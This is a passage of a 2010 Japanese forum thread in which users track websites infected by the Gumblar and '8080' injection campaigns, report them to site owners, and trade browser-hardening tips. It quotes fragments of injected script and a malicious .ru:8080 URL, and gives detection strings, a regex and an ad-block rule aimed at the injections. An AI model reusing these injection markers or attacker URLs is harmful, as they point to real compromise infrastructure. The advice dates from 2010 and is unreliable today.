鯖缶から該当サイトに伝達のお返事ありました。
401になってます。
124:名無しさん@お腹いっぱい。
10/05/25 21:42:01
>>118
一部の感染だけは認めるが後はでっち上げか
125:名無しさん@お腹いっぱい。
10/05/25 21:45:04
Avastあたりで診断しているなら誤診か
126:名無しさん@お腹いっぱい。
10/05/25 21:47:03
誤診あげ
127:名無しさん@お腹いっぱい。
10/05/25 21:55:13
図星か
128:名無しさん@お腹いっぱい。
10/05/25 21:57:52
>>124
全部見たわけじゃないけど
例えばpasotasuは明らかに今日修正してる
他のページは2009年のほぼ同時刻にまとめて更新されてるのに特定ページだけ今日更新
しかも発見が遅れたTOPじゃないページは4時間後に修正
原因わかってないだろうから再改ざんされる可能性が高い
top Tue, 25 May 2010 08:16:10 GMT
repair.html Tue, 25 May 2010 12:50:38 GMT
hoshu.html Wed, 29 Jul 2009 01:32:40 GMT
order.html Wed, 29 Jul 2009 01:32:47 GMT
price.html Wed, 29 Jul 2009 01:32:47 GMT
profile.html Wed, 29 Jul 2009 01:32:48 GMT
129:名無しさん@お腹いっぱい。
10/05/25 21:59:33
>>128
言い訳は見苦しいな
130:名無しさん@お腹いっぱい。
10/05/25 22:12:25
>>129
ぱそたすさん自演おつです^^^^
そんなことするより早くPCをなおしたほうがいいよ^^^^^
131:名無しさん@お腹いっぱい。
10/05/25 22:12:33
よくクソミソな精度で感染報告できたもんだ
132:名無しさん@お腹いっぱい。
10/05/25 22:21:44
あること無いことをでっち上げて、三流週刊誌並みの意識だな
133:名無しさん@お腹いっぱい。
10/05/25 22:23:12
ID出ないの不便だな
>>128は自分だけど>>118は違う人
報告されてるのを確認しただけだから探し方は知らん
pasotasuも再改ざんされればわかるだろ
見苦しい抵抗でかわいそうになるな
134:名無しさん@お腹いっぱい。
10/05/25 22:27:54
嘘をつくならもっと上手い嘘にしろ
135:名無しさん@お腹いっぱい。
10/05/25 22:34:18
ローテクな検出機では、誤検出も止むを得ないか(笑)
136:名無しさん@お腹いっぱい。
10/05/25 22:34:52
>>128-129
感染ページを確認すたのでメルポするを。
137:名無しさん@お腹いっぱい。
10/05/25 22:38:55
>>136 ど~ん
でじろにも報告すた。
138:名無しさん@お腹いっぱい。
10/05/25 22:40:18
勘違いの迷惑なメールほどうざいものはない
間違いを素直に認めればいいものを
139:名無しさん@お腹いっぱい。
10/05/25 22:46:37
緑になりますやうに。(-人-)
URLリンク(online.drweb.com)
140:名無しさん@お腹いっぱい。
10/05/25 22:54:11
age
141:名無しさん@お腹いっぱい。
10/05/25 23:06:02
セキュリティ板の勢いトップのスレはこんなものか(笑)
呆れたぜ(笑笑笑)
142:名無しさん@お腹いっぱい。
10/05/25 23:07:34
勢いに流されるなんて、お馬鹿ですね
143:名無しさん@お腹いっぱい。
10/05/25 23:12:04
新たな板に移るか(笑笑笑)
144:名無しさん@お腹いっぱい。
10/05/25 23:22:00
モレもつれてって~(笑笑笑)
145:名無しさん@お腹いっぱい。
10/05/25 23:42:24
この寒々しいスレを少しでも活気付ける為にも笑々しいスレにしてみせます
というのが>>141のマニフェストということか
奥が深い
146:名無しさん@お腹いっぱい。
10/05/26 00:36:28
>>138
パソコン活用講座でウイルスに感染しようとは
ぱそたすさんはハイレベルおすなあ
147:名無しさん@お腹いっぱい。
10/05/26 02:26:57
サンスポネット大人向けがとってもmondaybubbleなことに…
とりあえずメル凸しといた
148:名無しさん@お腹いっぱい。
10/05/26 03:24:19
>>147
乙、鯖缶とサンスポとmsnにもフォームでつーほーすた。
149:名無しさん@お腹いっぱい。
10/05/26 04:46:48
www.pasotasu.netさん
mamapapaはGoogleのキャッシュに残ってますよ
URLリンク(megalodon.jp)
ちゃんと改竄告知したほうがプロっぽいですよ
150:名無しさん@お腹いっぱい。
10/05/26 05:03:06
pasotasuも魚拓あるから
URLリンク(megalodon.jp)
151:名無しさん@お腹いっぱい。
10/05/26 07:05:16
というか、噛み付いてたのは隠蔽しようと目論んだ社員だろw
152:↑↑、↑↑↑
10/05/26 08:03:10
うわっ気色悪い書き込み;知的障害者?
153:名無しさん@お腹いっぱい。
10/05/26 08:27:15
pasotasu()笑
154:名無しさん@お腹いっぱい。
10/05/26 08:32:23
ふぁびょんなよ双方
155:名無しさん@お腹いっぱい。
10/05/26 13:59:54
ぱそたすわかりやすすぎてかわいそうになる
156:コテハン ◆8080adndqg
10/05/26 16:13:23
【陥落サイトのURL悪用厳禁】
www●biz-x●jp
www●wille2●com/
allety●net ←8080 + str="<ijbwjuics src=" + unescape(
www●hawaiianwalker●com/
【本日の目玉商品(違)】
www●n2p●jp/
Web制作、Webデザイン、システム開発・・
157:名無しさん@お腹いっぱい。
10/05/26 16:18:21
dokuta●ehoh●net
158:名無しさん@お腹いっぱい。
10/05/26 16:21:39
> www●n2p●jp/
???
159:コテハン ◆8080adndqg
10/05/26 16:25:12
ちょっと追記
www●n2p●jp/には、最下部の8080と・・・
<body id="n2p.jp" class="topBody">
<script type='text/javascript'>str="<ijbwjuics src=" + unescape(・・・
2系統が装填されておりますw
更に・・・
webcache●googleusercontent●com/search?q=cache:UROQ0WRKXtQJ:www●n2p●jp/
ijbwjuics src= → ない
8080 → 装填済
160:名無しさん@お腹いっぱい。
10/05/26 16:30:43
aspstone-co●com/blog/
161:名無しさん@お腹いっぱい。
10/05/26 16:37:34
> 最下部の8080と
???
162:名無しさん@お腹いっぱい。
10/05/26 17:31:12
通販サイトが改ざんされて
それを放置したままというのがありえない
まさか管理者は改ざんされたことを知らずにサイトの更新だけしているのか?
163:名無しさん@お腹いっぱい。
10/05/26 17:52:14
>>161
URLリンク(jsunpack.jeek.org)
164:名無しさん@お腹いっぱい。
10/05/26 18:07:44
具体的にどこよ
165:名無しさん@お腹いっぱい。
10/05/26 20:10:22
>>147
サンスポ本体もまずい?
166:名無しさん@お腹いっぱい。
10/05/26 20:31:46
通常JavaScriptとかFlashは切ってるんだけど
Flashクッキーってみんなどうしてる?
一応、今は切ってるんだけど
必要な際いちいち入れるの面倒でちょっと迷ってたり……
Flashクッキーが悪用される例とかってどのくらいあるん?
167:名無しさん@お腹いっぱい。
10/05/26 20:34:27
アップーでとしてれば大丈夫だから
アホは考えるだけ無駄
168:名無しさん@お腹いっぱい。
10/05/26 20:36:12
クッキーが何かすら分かってないんだな
169:名無しさん@お腹いっぱい。
10/05/26 21:05:18
>>168
そりゃおめーだろ
170:名無しさん@お腹いっぱい。
10/05/26 21:36:00
AdobeReaderを使ってなくてJava Runtime Environmentを最新版に更新してれば
Web改竄ウイルスには感染しないの?
171:名無しさん@お腹いっぱい。
10/05/26 21:47:06
>>167
自分の脳みそもうpだてしとけば?
172:名無しさん@お腹いっぱい。
10/05/26 22:14:24
ふぁびょったか
173:名無しさん@お腹いっぱい。
10/05/26 22:20:13
JREの残骸が消えてくれない
174:名無しさん@お腹いっぱい。
10/05/26 22:23:00
ふぁっびょーん
175:名無しさん@お腹いっぱい。
10/05/26 22:24:06
IDでねー板は駄目だなw
そもそもネタスレなのかも知れねーけどw
176:名無しさん@お腹いっぱい。
10/05/26 22:25:49
JREの残骸ってJavaRaで消えるのでは?
177:名無しさん@お腹いっぱい。
10/05/26 22:42:28
>>176
俺はアンインストールしてから
やったらきえた
178:名無しさん@お腹いっぱい。
10/05/26 22:43:55
>>166
CCクリーナーで簡単に管理できるよ
おれっちは全部拒否
179:名無しさん@お腹いっぱい。
10/05/26 23:13:31
>>178
オプション>クッキーリストまでは辿りついたけど
操作(拒否?削除?)が分かんないっす・・・
180:名無しさん@お腹いっぱい。
10/05/26 23:25:35
みんなやっぱFlashクッキーも切ってるのか・・・?
181:名無しさん@お腹いっぱい。
10/05/26 23:28:54
んなわけねえだろアホらしい
182:名無しさん@お腹いっぱい。
10/05/26 23:33:06
クッキーってテキストだろ
Flashのは違うのか
183:名無しさん@お腹いっぱい。
10/05/26 23:34:00
HTTPリダイレクト全部弾いてるって奴もいたから何とも言えないな
人それぞれ
184:名無しさん@お腹いっぱい。
10/05/26 23:36:41
ここレベル高けぇんだか低いんだか全く分からん……
185:名無しさん@お腹いっぱい。
10/05/26 23:48:56
玉石混淆
186:名無しさん@お腹いっぱい。
10/05/26 23:52:25
>>3
以上のことはおまじないレベルだから好きにしろ
187:名無しさん@お腹いっぱい。
10/05/26 23:58:45
>>170
使ってないんじゃなくてアンインストールしないとだめ
188:名無しさん@お腹いっぱい。
10/05/27 00:05:24
>>179
保持したいクッキーのurlを右側の欄にドラッグ&ドロップ
拒否したい場合はなにもしなくてもOK
つまりCCクリーナーインストールした時点でクッキーは全部はじかれる
189:名無しさん@お腹いっぱい。
10/05/27 00:07:35
ちなみにFlashクッキーはGumblarに関係ない
190:名無しさん@お腹いっぱい。
10/05/27 00:21:14
スレチだがflash cookieについて
URLリンク(www.itmedia.co.jp)
191:名無しさん@お腹いっぱい。
10/05/27 00:52:29
CCクリーナーではなくCcleanerつまりCクリーナーである件について
192:名無しさん@お腹いっぱい。
10/05/27 01:46:35
>>190
ありがとう。こういうものの存在すら知らなかった…
193:名無しさん@お腹いっぱい。
10/05/27 02:17:22
>156 確かに目玉商品w
194:名無しさん@お腹いっぱい。
10/05/27 08:02:52
>>189
あるよ。
以上。
はい次の方。
195:名無しさん@お腹いっぱい。
10/05/27 09:05:17
結局ただのクッキーじゃねえか
いばりやがって
196:名無しさん@お腹いっぱい。
10/05/27 10:06:42
>>118
再発?orあれからまだ気づいてない?
aguseで反応
wangnin●com/about/index●html
197:名無しさん@お腹いっぱい。
10/05/27 10:17:21
gredじゃ反応せず
このスレ見てると頼ってる人が多いみたいだけど、、、
gredは反応示すことがほとんどない
どっちが正しいのかは知らんけど
198:名無しさん@お腹いっぱい。
10/05/27 10:44:34
両方試して、片方だけでも疑いが出たら危険と思う
Danさんのでソース詳しく見てみればいいよ
199:名無しさん@お腹いっぱい。
10/05/27 13:31:54
>>196
tenthprofit■ru:8080/google.com/comdirect.de/macys.com.php
典型的な8080さんですね。ケツに謎のMD5ハッシュが付くのも特徴的。
200:名無しさん@お腹いっぱい。
10/05/27 13:58:06
ばらの花には棘がある
www●barakai●com
201:名無しさん@お腹いっぱい。
10/05/27 14:28:15
>>197
このスレ住人はソース直接見るからgredなんて頼ってないよ
お客さん向けに目安として示してるだけだよ
202:名無しさん@お腹いっぱい。
10/05/27 14:30:03
>>196
放置されてるだけだね
Last-Modified: Thu, 20 May 2010 02:53:32 GMT
203:名無しさん@お腹いっぱい。
10/05/27 16:41:39
>>201
PC初心者にはGENO系Gumbler系のスレが無いからねぇ
ここに縋るしかない
まぁだからってここに書いてあるURLじゃないから大丈夫とは絶対限らないんだけど
>>3>>4こなせば現状では万が一感染ページ踏んでも大丈夫だから怖がりすぎる必要は無い……筈
204:名無しさん@お腹いっぱい。
10/05/27 18:17:26
www●asu-job●com
pc-telcom●com
※population-japan●com関連
205:名無しさん@お腹いっぱい。
10/05/27 18:17:57
>>200
使えるねっとに問い合わせたら、こちらでは対処しかねるそうで
レンタルサーバーは安全、信頼の使えるねっとwwwww
206:名無しさん@お腹いっぱい。
10/05/27 18:33:05
thinkpadのIE8でネットを閲覧していたら
ウィルスバスター2010が反応してmal gumblarを
①検出、駆除できず
②隔離できずと表示されました
こんなこと初めてです。どうすればいいのでしょう?
207:名無しさん@お腹いっぱい。
10/05/27 18:35:54
URLは?
OSは
プラグインは?
ActiveXやJavaScript等の設定は?
208:名無しさん@お腹いっぱい。
10/05/27 19:22:48
>>198-202
なるほど
いろいろ事情がわかるコメでした
209:名無しさん@お腹いっぱい。
10/05/27 19:41:49
>>200
メル凸しときました
>>205
数日前にallety●netが陥落してたんで、つかえるネットにメル凸したら
「報告感謝、サービス停止したから確認して」って内容の返信がきたよ?
210:名無しさん@お腹いっぱい。
10/05/27 21:18:20
<script>var JFZSz = document;function kGccA(pFpvv){ var ~
結果: 4/41 (9.76%)
width、height、length、style…樹を隠すには森の中ですか
>>200
>>205
「ご連絡いただきましたサイトにつきましては、弊社でも確認し
不正なスクリプトを確認させて頂きましたので、取り急ぎ
サービスの停止を行わせていただきました。」
との事
211:名無しさん@お腹いっぱい。
10/05/27 21:32:27
自分のWEBサイトへの攻撃ログ確認してたら
設置してないWordPressやらAWstatsを探そうとクロールしてるホストがあった
80番ポートが空いてたので、Dan's View Sourceで確認したら案の定「.ru:8080」があった
こういうのってボットネットワークのゾンビなのかねぇ?
212:名無しさん@お腹いっぱい。
10/05/27 21:34:06
>>210
サイトは停止してないし
Gumblar判定もまだでるけど?
213:あんちたった ◆MOTO.0SDfQ
10/05/27 22:21:38
>>212
何を止めたんだろうねwwwサーバ止めないと駄目なのにねwww
214:名無しさん@お腹いっぱい。
10/05/27 22:49:28
>>212
ふたりともリロード汁
制作会社のページに転送されるだろ?
215:名無しさん@お腹いっぱい。
10/05/27 22:50:15
>>2>>3の対策すれば大丈夫っていう人と
おまじない程度っていうひとがいるね
どっちがほんとなのかは謎といったところか
216:名無しさん@お腹いっぱい。
10/05/27 22:50:59
あ、aguseなら今ちょっと壊れてるぞ
aguse側のDNS更新されてなさそう
217:名無しさん@お腹いっぱい。
10/05/27 22:52:59
…とおもったら、wwwのサブドメインつけると止まってねえw
糞レスしてふたりともごめん
218:名無しさん@お腹いっぱい。
10/05/27 22:53:05
>3>4以上の
スクリプト全切とかをおまじない程度っていってんだよ
219:名無しさん@お腹いっぱい。
10/05/27 22:54:47
いや、やっぱりDNSの更新が行き渡ってないだけだ。
URLリンク(www)<)●com/
止まってる。
220:名無しさん@お腹いっぱい。
10/05/27 22:56:49
>>218
なるほど
わかりました
221:名無しさん@お腹いっぱい。
10/05/27 23:06:38
通用するのは今だけだと思うけどProxomitronで
scriptタグ後にハッシュ値がきたら警告するようにしてます
$NEST(<script,\1</script>)\s<!--[0-9a-f]+{32}--> にマッチで置換
222:名無しさん@お腹いっぱい。
10/05/28 01:55:03
URLリンク(www.tanteifile.com)
URLリンク(www.tanteifile.com)
223:名無しさん@お腹いっぱい。
10/05/28 07:40:26
このスレでときどき
忘れていた意外な情報を得る
224:名無しさん@お腹いっぱい。
10/05/28 10:26:57
取扱注意
www●adwalk●co●jp
そういえば、とある議員のホームページも改ざんされてたな
225:名無しさん@お腹いっぱい。
10/05/28 12:23:43
にゃ
URLリンク(www.hds-x)●com/
226:名無しさん@お腹いっぱい。
10/05/28 12:37:09
URLリンク(www)<)◎com/
URLリンク(otokudou)<)◎borneomarathon◎com/jpn/home◎html
URLリンク(www)<)◎spalodge◎co◎nz/
URLリンク(www)<)◎jp/
URLリンク(sartur)<)◎com/
URLリンク(hampson-scott)<)◎ondeugendstel◎com/web/media2/index◎php?option=com_rss&feed=RSS2◎0&no_html=1
さて、エンジェルビーツ始まるまで寝るか…。重複チェックしてないお(`・ω・´)
227:名無しさん@お腹いっぱい。
10/05/28 12:46:52
>>226
14時間も寝るのかよw
取扱注意
www●wood-sadoh●co●jp/classroom/index.html
TOPはまだ改ざんされてなかったけど、時間の問題だな
228:名無しさん@お腹いっぱい。
10/05/28 13:41:59
さてと、どんなサイトがGumblarに?
チェックしてゼロデイの傾向と対策を、、、
ってもう、まんべんなくだなw
229:名無しさん@お腹いっぱい。
10/05/28 14:00:49
>>228
管理者のセキュリティ意識が無いサイトがやられてるだけ
サイトの内容は無関係
230:コテハン ◆8080adndqg
10/05/28 14:47:51
【陥落サイトのURL悪用厳禁】
www●biz-x●jp
www●i-keiei●jp/
www●w-ouen●com/league/index●html ←早稲田大学応援部
cowgirl●jp/
↓
<script type='text/javascript'>str="<ijbwjuics src=・・・
<script>try {var Qv='QN'} catch(Qv){};var・・・
<!--改竄されたので絶賛放置中!-->
※アクセス注意!※
www●aquaview●jp
↓
www●aquaview●jp/m_shop/index●html
↓
webcache●googleusercontent●com/search?q=cache:9SfGiGAU864J:www●geocities●jp/kic_aquaview/order●html
※消滅してたので、キャッシュから・・
231:名無しさん@お腹いっぱい。
10/05/28 15:19:23
>>230
よいところにいらっしゃった
><script type='text/javascript'>str="<ijbwjuics src=・・・
これ、どうやって拾ったらいい?
色々試してるんだけどどうにもうまくいかない
232:名無しさん@お腹いっぱい。
10/05/28 16:15:27
取扱注意
www●garden-bank●com
233:名無しさん@お腹いっぱい。
10/05/28 16:34:21
www●i-keiei●jp
www●w-ouen●com/league
cowgirl●jp
www●garden-bank●com
メル凸済み、反応待ち
234:名無しさん@お腹いっぱい。
10/05/28 17:44:54
>>233
www●i-keiei●jp
なにもないが、メル凸済みだからか?
235:名無しさん@お腹いっぱい。
10/05/28 17:51:05
>>225のサイト、ブログ経由で凸した
236:コテハン ◆8080adndqg
10/05/28 18:00:29
>>231
"vxoq3" "xaoz3" ←センセイ向け
"ijbwjuics" "str.replace(" ←禿向け
現時点ではほとんど釣れないみたい・・・
8080系の陥落サイトに寄生してるから、ソースを見る時
<body>の後側も見ておくと良いかも
237:226 ◆4SB9WSR5xY
10/05/28 18:02:14
さすがに14時間も寝られなかった。
URLリンク(cocoro-dhp)◎sakura◎ne◎jp/
238:コテハン ◆8080adndqg
10/05/28 18:08:21
>>234
センセイの記憶を覗いてみにゃ
webcache●googleusercontent●com/search?q=cache:RW9_Hzfo7hMJ:www●i-keiei●jp/
239: ◆4SB9WSR5xY
10/05/28 18:14:25
URLリンク(abs)<)◎com/
URLリンク(extratube)<)◎org/
URLリンク(laschuwi)<)◎com/
URLリンク(mature-lessons-porn)<)◎eu/
URLリンク(flowertask)<)◎info/
URLリンク(mb3z)<)◎jp/
URLリンク(hohoemi-link)◎lovepop◎jp/
240:名無しさん@お腹いっぱい。
10/05/28 18:29:39
>>239
おまえは何をやってるんだ?
241: ◆4SB9WSR5xY
10/05/28 18:32:57
URLリンク(hyper)<)◎co◎jp/
URLリンク(mag)<)◎jp/
URLリンク(truth-co)<)◎sakura◎ne◎jp/
URLリンク(minatomo)<)◎shard◎jp/syozyonudo/
URLリンク(makino-fudousan)<)◎sakura◎ne◎jp/
URLリンク(situgyou)<)◎jp/
新しい方法試してみたけど、誤爆率高いorz
とりあえず.jpだけ。
242: ◆4SB9WSR5xY
10/05/28 18:38:10
>>240
クソコテ氏ねですね。
ごめんなさい。
243:名無しさん@お腹いっぱい。
10/05/28 18:39:30
テンプレ見てまともに出来ないなら余計なモン貼るなゴミがっつってんだよ
244:名無しさん@お腹いっぱい。
10/05/28 18:56:08
>>234
Gredで覗いてみて
>>235
乙です
>>236
ご教授感謝、無理を申しました
頑張ってみます
245:名無しさん@お腹いっぱい。
10/05/28 22:25:37
>>216>>219
そんなことあるんだ
246:名無しさん@お腹いっぱい。
10/05/28 22:32:41
>>198
少々亀レスですみませんが
たとえばどのようなコードや文字列に注意すればいいのでしょうか
247:名無しさん@お腹いっぱい。
10/05/28 22:34:11
まだaguseは元に戻ってない?
248:名無しさん@お腹いっぱい。
10/05/28 22:41:57
>>7を踏んでしまったのですが大丈夫でしょうか?
249:名無しさん@お腹いっぱい。
10/05/28 22:44:57
>>246
マルチはやめようね
250:248
10/05/28 23:19:36
>>7を踏んだのはつい先ほどなのですでに7のサイトは復旧されてるとは思うのですが
251:名無しさん@お腹いっぱい。
10/05/29 00:10:13
>>248,250
ここは鑑定スレじゃないから
↓こっちで聞け↓
勇気がなくて踏めないURL鑑定スレin初質 Part41
スレリンク(qa板)
252:名無しさん@お腹いっぱい。
10/05/29 00:36:59
Ν即で>>226の一番下のやつ貼られてて会社のPCで踏んでしまったんですけどこれってやばいんでしょうか
>>3の設定に直してスキャンしてみましたけど何も出なかったです…
253:名無しさん@お腹いっぱい。
10/05/29 00:41:40
>>252
スペックかけよ
OS,ブラウザ,Adobe ReaderのVer,対策ソフト
254:名無しさん@お腹いっぱい。
10/05/29 00:49:51
>>252
踏んでから>>3の設定に直しても意味ないぞw
つか、アンチウイルスソフトは反応しなかったのか?
踏んだ時の症状を教えてくれ。
255:253
10/05/29 00:54:40
>>252
もしもそのPCで会社のサイト更新してるなら、そのうちお前さんの会社のサイトが
このスレに登場するww
ご愁傷さま
256:名無しさん@お腹いっぱい。
10/05/29 00:55:26
>>253,254
ありがとうございます
【OS】XP pro SP3
【ブラウザ】Internet Explorer 8(タブブラウザのDonut RAPTっての使ってます)
【Microsoft Updateの更新の状態】最新でした
【セキュリティソフトと年式】ノートンインターネットセキュリティ 2009
【回線の種類・ルータの有無】光回線でルータ使用中
【Adobe ReaderのVer】最新でした
Donut RAPT使ってる時はノートンの保護機能?は働かないみたいです
今は自宅のPCからでこれぐらいしか覚えてなくて申し訳ないです
257:名無しさん@お腹いっぱい。
10/05/29 00:56:41
>>248
大丈夫、数日前に対策されとる
>>99にも書かれとる
しかしテンプレに罠仕込むなんてこのスレどうしちまったんだ
258:名無しさん@お腹いっぱい。
10/05/29 00:57:04
>>255
いえ会社はサイト持ってないです
孫請けの零細ですので
259:名無しさん@お腹いっぱい。
10/05/29 01:06:44
最近のはVista・7のUAC・保護モードも素通りするのかね
260:253
10/05/29 01:08:52
>>256
>>【Adobe ReaderのVer】最新でした
これが本当なら大丈夫なはず。踏む前から最新だったんだよな?
261:名無しさん@お腹いっぱい。
10/05/29 01:15:55
>>256
AdobeReaderは最新じゃなくバージョンをきちんと確認しろ
JavaとFlashPlayerもね
262:256
10/05/29 01:16:06
>>260
はい、更新チェックで確認しました
そうですかとりあえず安心しました。ありがとうございます
263:256
10/05/29 01:23:38
>>261
連投すいません
>3の更新確認でそれら全て更新チェックして全て最初から最新だったと記憶してます。
後、図に乗った質問で申し訳ないんですけど、このウイルスはどういった悪さをするんでしょう?
264:名無しさん@お腹いっぱい。
10/05/29 01:24:43
>>262
ノートンなら以下のクラウド型と併用可だからしてみては?
【併用可】gred AntiVirusアクセラレータ part2
スレリンク(sec板)
265:248
10/05/29 01:26:43
>>257
ありがとうがざいます
一安心です
266:名無しさん@お腹いっぱい。
10/05/29 01:26:56
>>258
どっちみち感染したらFTP含めてWebサービスすべてのIDパスはとられる
自分だけでなくLAN内すべて
あとは偽セキュリティソフトのインストール、特定サイトへの攻撃、
BOT機能のインストールなどいろいろ
267:名無しさん@お腹いっぱい。
10/05/29 01:35:43
>>264
これは今後のセキュリティですね
ありがとうございます。あとで確認してみます
>>266
そうですか…
そうなってくると自分にはもうお手上げですねorz
268:253
10/05/29 01:40:55
>>267
そろそろスレチだが、
>>ノートンインターネットセキュリティ 2009
もしまだライセンス残ってるなら、2010にタダでバージョンうpできるからやっとけ。
URLリンク(updatecenter.norton.com)
269:名無しさん@お腹いっぱい。
10/05/29 01:52:21
>>257
荒らしの仕業だろ
270:名無しさん@お腹いっぱい。
10/05/29 01:58:01
>>257
>>16-19
271:256
10/05/29 02:11:36
>>268
了解です
みなさんありがとうございました
272:名無しさん@お腹いっぱい。
10/05/29 03:42:02
URLリンク(money)●zarathustra-wins●net/2010/01/%E3%82%AC%E3%83%B3%E3%83%96%E3%83%A9%E3%83%BC%E5%AF%BE%E7%AD%96%E3%81%AE%E6%83%85%E5%A0%B1%E3%81%AE%E3%81%BE%E3%81%A8%E3%82%81/
鑑定スレに貼ってたな
273:名無しさん@お腹いっぱい。
10/05/29 12:07:41
日創研石川経営研究会
ウィルスに感染したのに告知無しで復旧
こういうところの会員も同じ穴の狢でモラルもないんだろうな。
274:名無しさん@お腹いっぱい。
10/05/29 12:11:41
>研究会
うさんくせー
275:名無しさん@お腹いっぱい。
10/05/29 12:24:59
専スレがあるじゃん
276:名無しさん@お腹いっぱい。
10/05/29 13:33:38
緑になりますやうに。(-人-)
URLリンク(online.us.drweb.com)
277:名無しさん@お腹いっぱい。
10/05/29 13:59:43
>>272
だが
URLリンク(www.zarathustra-wins.net)のサイトにある
ガンブラー対策のページだな
そこがやられたらしい
272のURLでググるとガンブラー質問系のサイトに結構貼られてるが罠か?
278:名無しさん@お腹いっぱい。
10/05/29 16:07:57
日創研石川経営研究会に電凸してみました
改竄の件は把握していない模様
URLリンク(www.aguse.jp)
↑の076-234-5554あいびーらぼ?がHPを作っていると認めました
>あいびーらぼ?さん
折り返しの電話ありませんねw
自分達のスキルに自信があるのでしょうね
このスレの情報以外の所も改竄されている様ですが、見つけられるかなw
279:名無しさん@お腹いっぱい。
10/05/29 16:24:15
www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
280:オルティス・ジャパン
10/05/29 16:57:52
>>279
www●itofound●or●jp
ここはガンブラーによって改竄されていると話すと電話を切る
更に電話をすると無言攻撃をする非礼極まりない所
対応は停止する
281:名無しさん@お腹いっぱい。
10/05/29 17:00:24
>www●j-sports●or●jp
CSJスポーツのサイト!?
282:名無しさん@お腹いっぱい。
10/05/29 17:09:48
管理人「gumbler?うっせぇバーカ」
283:名無しさん@お腹いっぱい。
10/05/29 17:21:50
あ
284:名無しさん@お腹いっぱい。
10/05/29 17:26:44
今日は所属してるボランティア団体が所有してるPC10台に、>>4 を施した。
VistaのマシンなんだがSP2すら当たっていなかったので心配だった。
普段は車に積んで移動してるので、なかなかメンテナンスの機会がなくて
たまにEモバなんかでネットに繋いだりするもんだからヒヤヒヤもので...
285:名無しさん@お腹いっぱい。
10/05/29 17:54:32
>>279
www●j-sports●or●jp
www●itofound●or●jp
cgi●members●interq.or●jp/aquamarine/ruvi/
メル凸済み、反応待ち
>>280
一応、so-netとJPCERT/CCにも通報してあります
コレでダメなら別の手を考えますよ…
>>281
ジェイスポーツは「www●jsports●co●jp」
感染してるのは「横浜市・川崎市サッカークラブ」です
286:名無しさん@お腹いっぱい。
10/05/29 18:16:19
告知もせず駆除するだけなんだなあ
個人ならまだわかる、でも法人が平然とやってのける
マジであきれる
287:コテハン ◆8080adndqg
10/05/29 18:16:44
【陥落サイトのURL悪用厳禁】
fps01●plala●or●jp/~zeiken/
www●marbell●jp/img2/photo/tenonaru/index●html
www●pflaster●co●jp/contact/
288:コテハン ◆8080adndqg
10/05/29 18:34:54
>>284
穴があるかもしれないPCには
Firefox+NoScript+AdblockPlus+RequestPolicy
この組み合わせを推奨する。
NoScript→<IFRAME>禁止にチェックを入れる
AdblockPlus→|URLリンク(*:8080) をブロック
289:名無しさん@お腹いっぱい。
10/05/29 19:02:18
>>288
レスありがとう
自宅のPCのデフォはFirefoxなんだが、車に積んでるのは
なにぶん初心者向け講習会用なので、困ったことにデフォは
IEなんだなこれが。
290:名無しさん@お腹いっぱい。
10/05/29 19:03:07
Firefoxなどのブラウザは、MSEや無料版アンチウイルスの幾つかなどトラフィックスキャンをしないものとは組み合わせることは好ましくない
JavascriptはどうしてもONにすることがあると思う、その時にスキャンできず素通りしてしまってる
291:名無しさん@お腹いっぱい。
10/05/29 19:06:18
d-pic●net
292:名無しさん@お腹いっぱい。
10/05/29 19:15:08
Firefoxはむしろダメだろ
293:名無しさん@お腹いっぱい。
10/05/29 19:50:20
だなIEが一番
294:名無しさん@お腹いっぱい。
10/05/29 20:16:12
>>289
とりあえずIE8にしておけばいいとおもうよ
もしくはGoogleChrome
わりと初心者にもすんなり受け入れられる
初心者はそもそもIEでも慣れてるわけじゃないから実はなんでもいいのだ
295:名無しさん@お腹いっぱい。
10/05/29 20:42:23
>>287
メル凸済み、pflasterにはメール届かず、その他は反応待ち
>>291
メル凸済み、反応待ち
296:名無しさん@お腹いっぱい。
10/05/29 21:10:09
テンプラの対策してたらIE8でも保護モードで運用すれば
ゼロDay食わない限りそうそう怖いことなかろうて
297:名無しさん@お腹いっぱい。
10/05/29 21:45:37
>>273-276
15:50着、かすぺ対応とのこと、持ってる人は確認お願いぽ。
> Trojan-Downloader.JS.Pegel.av
> New malicious software was found in these files. Detection will be included in the next update. Thank you for your help.
>>278
乙乙。
鯖缶につーほーしておいてた返事、担当に伝えるとのこと。
298:297
10/05/29 21:48:31
てか>>276はまだ赤かったので>>297カキコしたんだが……
299:297
10/05/29 21:54:20
やっぱ未修正があるー。。。
300:名無しさん@お腹いっぱい。
10/05/29 21:55:55
>>279
おいおいそれってスカパーとかCATVのスポーツかよ?
301:名無しさん@お腹いっぱい。
10/05/29 21:57:04
>>286
駆除すらされずメル凸するまで放置ということもあるけど
まさか毎日ページを見ている管理人が改竄に気づいてないというパターンなのかな?
302:名無しさん@お腹いっぱい。
10/05/29 21:58:17
>>300
CSのJスポーツはwww●jsports●co●jp
303:284
10/05/29 22:19:30
ボランティア団体の方針で、ブラウザはIE7ということになってて...
つまりその、テキストと画面のデザインがほんのちょっとでも異なると
講習生がとまどうからという理由で。
304:名無しさん@お腹いっぱい。
10/05/29 22:23:21
>>303
とまどうのは(柔軟性の無い)おしえているほうだにゃ。
互換性表示ってのあるのに…
305:304
10/05/29 22:25:56
あー、テキストって教習本のことか。
買い換えろ!
つか実施で説明できない人が教えてんのか。
306:名無しさん@お腹いっぱい。
10/05/29 22:33:11
馬鹿のくせに偉そうに指示するな
307:名無しさん@お腹いっぱい。
10/05/29 22:38:48
>>303
今後のことを考えても全く一緒なことはありえないから
画面は多少変わることもあることを口頭で良いから教えるべきだとは思う
家にあるPCがテキストと違うと使えないってことになるだろ
まあ車と違ってコロコロUI変えちゃってる方にも問題はあるんだけども
308:304
10/05/29 23:12:30
うん、言い過ぎたかも。
>>306
ノ
309:名無しさん@お腹いっぱい。
10/05/29 23:20:51
このスレにFirefoxのアンチがいる
310:名無しさん@お腹いっぱい。
10/05/29 23:25:09
お前や
311:名無しさん@お腹いっぱい。
10/05/29 23:32:33
逆で無知なくせに無闇に薦めるやつがいるだけ
312:284
10/05/30 00:11:00
みなさんご心配いただいてありがとう
なにぶん、講習生はお年寄りが対象なので、幹部連中は...
「セキュリティに関してはあまり教え過ぎるとせっかくのやる気をそぐし、
してはいけないことだらけでつまらなくて結局身に付かない」
...ということで、WindowsUpdateを教えることさえあまり乗り気ではないのですよ。
それに、件のパソコンは、長い時にはひと月に一日使うか使わないかっ
